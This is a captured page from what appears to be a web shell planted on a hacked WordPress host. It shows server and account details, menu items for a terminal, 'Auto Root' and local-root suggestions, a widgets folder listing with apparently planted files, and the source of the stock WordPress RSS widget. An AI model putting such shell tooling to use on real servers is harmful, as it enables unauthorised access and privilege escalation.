Linux server322.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 198.54.115.172 & Your IP : 216.73.216.179
Domains :
Cant Read [ /etc/named.conf ]
User : fourgwnl
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fourgwnl /
public_html /
wp-includes /
widgets /
Delete
Unzip
Name
Size
Permission
Date
Action
dir
[ DIR ]
dr-xr-xr-x
2024-01-15 10:46
.htaccess
148
B
-r--r--r--
2024-01-15 10:47
class-wp-nav-menu-widget.php
6.44
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-archives.php
6.65
KB
-rw-r--r--
2021-06-09 09:10
class-wp-widget-block.php
6.31
KB
-rw-r--r--
2021-07-14 03:34
class-wp-widget-calendar.php
2.84
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-categories.php
6.9
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-custom-html.php
11.88
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-links.php
7.12
KB
-rw-r--r--
2020-10-09 06:45
class-wp-widget-media-audio.php
5.94
KB
-rw-r--r--
2020-01-10 11:00
class-wp-widget-media-gallery.php
7.12
KB
-rw-r--r--
2020-01-10 11:00
class-wp-widget-media-image.php
11.75
KB
-rw-r--r--
2020-10-19 02:57
class-wp-widget-media-video.php
8.21
KB
-rw-r--r--
2020-02-19 04:49
class-wp-widget-media.php
13.77
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-meta.php
4.01
KB
-rw-r--r--
2021-06-09 09:10
class-wp-widget-pages.php
5.6
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-recent-comments.php
6.91
KB
-rw-r--r--
2021-06-09 09:10
class-wp-widget-recent-posts.php
5.82
KB
-rw-r--r--
2021-06-09 09:10
class-wp-widget-rss.php
4.46
KB
-rw-r--r--
2021-06-09 05:05
class-wp-widget-search.php
2.66
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-tag-cloud.php
6.61
KB
-rw-r--r--
2021-05-25 17:57
class-wp-widget-text.php
20.8
KB
-rw-r--r--
2021-05-25 17:57
error_log
4.75
KB
-rw-r--r--
2023-02-19 16:50
index.php
1.49
KB
-rw-r--r--
2024-01-15 00:29
input.php
1.49
KB
-rw-r--r--
2024-01-15 01:16
Save
Rename
<?php /** * Widget API: WP_Widget_RSS class * * @package WordPress * @subpackage Widgets * @since 4.4.0 */ /** * Core class used to implement a RSS widget. * * @since 2.8.0 * * @see WP_Widget */ class WP_Widget_RSS extends WP_Widget { /** * Sets up a new RSS widget instance. * * @since 2.8.0 */ public function __construct() { $widget_ops = array( 'description' => __( 'Entries from any RSS or Atom feed.' ), 'customize_selective_refresh' => true, 'show_instance_in_rest' => true, ); $control_ops = array( 'width' => 400, 'height' => 200, ); parent::__construct( 'rss', __( 'RSS' ), $widget_ops, $control_ops ); } /** * Outputs the content for the current RSS widget instance. * * @since 2.8.0 * * @param array $args Display arguments including 'before_title', 'after_title', * 'before_widget', and 'after_widget'. * @param array $instance Settings for the current RSS widget instance. */ public function widget( $args, $instance ) { if ( isset( $instance['error'] ) && $instance['error'] ) { return; } $url = ! empty( $instance['url'] ) ? $instance['url'] : ''; while ( ! empty( $url ) && stristr( $url, 'http' ) !== $url ) { $url = substr( $url, 1 ); } if ( empty( $url ) ) { return; } // Self-URL destruction sequence. if ( in_array( untrailingslashit( $url ), array( site_url(), home_url() ), true ) ) { return; } $rss = fetch_feed( $url ); $title = $instance['title']; $desc = ''; $link = ''; if ( ! is_wp_error( $rss ) ) { $desc = esc_attr( strip_tags( html_entity_decode( $rss->get_description(), ENT_QUOTES, get_option( 'blog_charset' ) ) ) ); if ( empty( $title ) ) { $title = strip_tags( $rss->get_title() ); } $link = strip_tags( $rss->get_permalink() ); while ( ! empty( $link ) && stristr( $link, 'http' ) !== $link ) { $link = substr( $link, 1 ); } } if ( empty( $title ) ) { $title = ! empty( $desc ) ? $desc : __( 'Unknown Feed' ); } /** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */ $title = apply_filters( 'widget_title', $title, $instance, $this->id_base ); $url = strip_tags( $url ); $icon = includes_url( 'images/rss.png' ); if ( $title ) { $title = '<a class="rsswidget" href="' . esc_url( $url ) . '"><img class="rss-widget-icon" style="border:0" width="14" height="14" src="' . esc_url( $icon ) . '" alt="RSS" /></a> <a class="rsswidget" href="' . esc_url( $link ) . '">' . esc_html( $title ) . '</a>'; } echo $args['before_widget']; if ( $title ) { echo $args['before_title'] . $title . $args['after_title']; } $format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml'; /** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */ $format = apply_filters( 'navigation_widgets_format', $format ); if ( 'html5' === $format ) { // The title may be filtered: Strip out HTML and make sure the aria-label is never empty. $title = trim( strip_tags( $title ) ); $aria_label = $title ? $title : __( 'RSS Feed' ); echo '<nav role="navigation" aria-label="' . esc_attr( $aria_label ) . '">'; } wp_widget_rss_output( $rss, $instance ); if ( 'html5' === $format ) { echo '</nav>'; } echo $args['after_widget']; if ( ! is_wp_error( $rss ) ) { $rss->__destruct(); } unset( $rss ); } /** * Handles updating settings for the current RSS widget instance. * * @since 2.8.0 * * @param array $new_instance New settings for this instance as input by the user via * WP_Widget::form(). * @param array $old_instance Old settings for this instance. * @return array Updated settings to save. */ public function update( $new_instance, $old_instance ) { $testurl = ( isset( $new_instance['url'] ) && ( ! isset( $old_instance['url'] ) || ( $new_instance['url'] !== $old_instance['url'] ) ) ); return wp_widget_rss_process( $new_instance, $testurl ); } /** * Outputs the settings form for the RSS widget. * * @since 2.8.0 * * @param array $instance Current settings. */ public function form( $instance ) { if ( empty( $instance ) ) { $instance = array( 'title' => '', 'url' => '', 'items' => 10, 'error' => false, 'show_summary' => 0, 'show_author' => 0, 'show_date' => 0, ); } $instance['number'] = $this->number; wp_widget_rss_form( $instance ); } }